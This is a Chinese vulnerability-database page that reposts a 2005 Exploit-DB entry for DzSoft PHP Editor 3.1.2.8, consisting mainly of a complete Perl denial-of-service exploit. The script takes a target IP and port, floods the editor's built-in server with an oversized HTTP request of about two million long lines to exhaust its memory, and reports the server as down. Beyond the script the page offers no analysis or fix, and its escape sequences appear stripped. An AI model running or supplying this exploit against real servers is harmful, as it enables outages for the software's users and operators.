DzSoft PHP Editor 3.1.2.8 – Denial of Service-安全小百科

DzSoft PHP Editor 3.1.2.8 – Denial of Service

漏洞ID	1055255	漏洞类型
发布时间	2005-07-15	更新时间	2005-07-15
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Windows	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/1109

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#!/usr/bin/perl
#
#    DzSoft PHP Server DOS Exploit
# ------------------------------------
#  Infam0us Gr0up - Securiti Research
# 
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
#

$subject = "DzSoft PHP Server DOS Exploit";
$vers = "DzSoft PHP Editor  3.1.2.8";
$vendor = "http://www.dzsoft.com";
$codz = "basher13 - basher13(at)linuxmail.org";

$ARGC=@ARGV;
if ($ARGC !=2) {
    print "n";
    print "   $subjectn";
    print "------------------------------------nn";
    print "Usage: $0 [remote IP] [port]n";
    print "Exam: $0 127.0.0.1 80n";
    exit;
}

use IO::Socket::INET;
use Tk;

$host=$ARGV[0];
$port=$ARGV[1];

print "n";
print "-------------------------------------------------------n";
print "[?] Version: libwww-perl-$LWP::VERSIONn";
print "[+] Connect to $host..n";
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') 
|| die "[-] Connection error$@n";

print "[+] Connectedn";
print "[+] Bindmode for socket..n";
sleep(1);
binmode($sock);

print "[+] Build buffer..n";
$hostname="Host: $host";
$bufy='A'x50;
$bufa='A'x8183;
$len=length($bufy);
$buff="GET / HTTP/1.1rn";
sleep(1);

print "[+] Now kill the process..waitn";
send($sock,$buff,0) || die "[-] send error:$@n";
print "[+] Sending buffer..n";
for($i= 0; $i < 2000000; $i++)
{
    $buff=" $bufarn";
    send($sock,$buff,0) || die "[*] send error:$@, Check if server D0s'edn";
}
$buff="$hostnamern";
$buff.="Content-Length: $lenrn";

$buff.="rn";
$buff.=$bufy."rnrn";

send($sock,$buff,0) || die "[-] send error:$@n";
print "[+] Server Out of Memoryn";
close($sock);
print "-------------------------------------------------------n";
my $mw = MainWindow->new(-title => 'INFO',);
    my $var;

    my $opt = $mw->Optionmenu(
                
                -options => [qw()],
                -command => sub { print "n[>]: ", shift, "n" },
                -variable => $var,
                )->pack;
    $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]);   
    $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack;
    MainLoop;

# milw0rm.com [2005-07-15]

相关推荐: Tribal Voice PowWow Password Vulnerabilities

Tribal Voice PowWow Password Vulnerabilities 漏洞ID 1104578 漏洞类型 Unknown 发布时间 1999-10-19 更新时间 1999-10-19 CVE编号 N/A CNNVD-ID N/A 漏洞平台…

文章版权归作者所有，未经允许请勿转载。

THE END

网络安全漏洞
# 漏洞 # php # dzsoft

喜欢就支持一下吧

DzSoft PHP Editor 3.1.2.8 – Denial of Service

DzSoft PHP Editor 3.1.2.8 – Denial of Service

|漏洞来源

|漏洞详情

|漏洞EXP

日常避险攻略

紧张局势重大升级！“第三次世界大战威胁迫近”

ChatGPT问答: RiscV 汇编怎么写 1到100 数字之和代码 RISC-V 汇编语言入门 add, sub, lw, sw, j 常用指令

RARS 汇编模拟器支持的RISC-V指令

使用FFMPEG快速替换视频中的音频

2023.03.26 我去年买了个表，一直走不准，现在终于可以设置时间了

公司成功上市啦！ – 作者:KOAL格尔国信

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

女祭女戚

帆软10.0 Getshell漏洞分析

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

UseBB BBcode Color Tag Code Injection Vulnerability

PHPGroupWare Addressbook Unspecified Vulnerability

鬼鼓

海南交警部门公布交通事故最新赔偿项目及标准

LionMax Software WWW File Share Pro服务拒绝漏洞

谷歌信息安全业务 Chronicle 发布首款商用产品

付费下载测试

zibll子比主题 v5.6最新免授权版

创建不做身份鉴定的HTTPClient发送HTTPS的POST请求的工具类，解决异常：sun.security.validator.ValidatorException: PKIX path vali

Python网络开发简单的IP城市定位WebAPI

Attack tive Directory – 作者:sec875

免费领爱企查两年会员

公司成功上市啦！ – 作者:KOAL格尔国信

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

女祭女戚

帆软10.0 Getshell漏洞分析

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa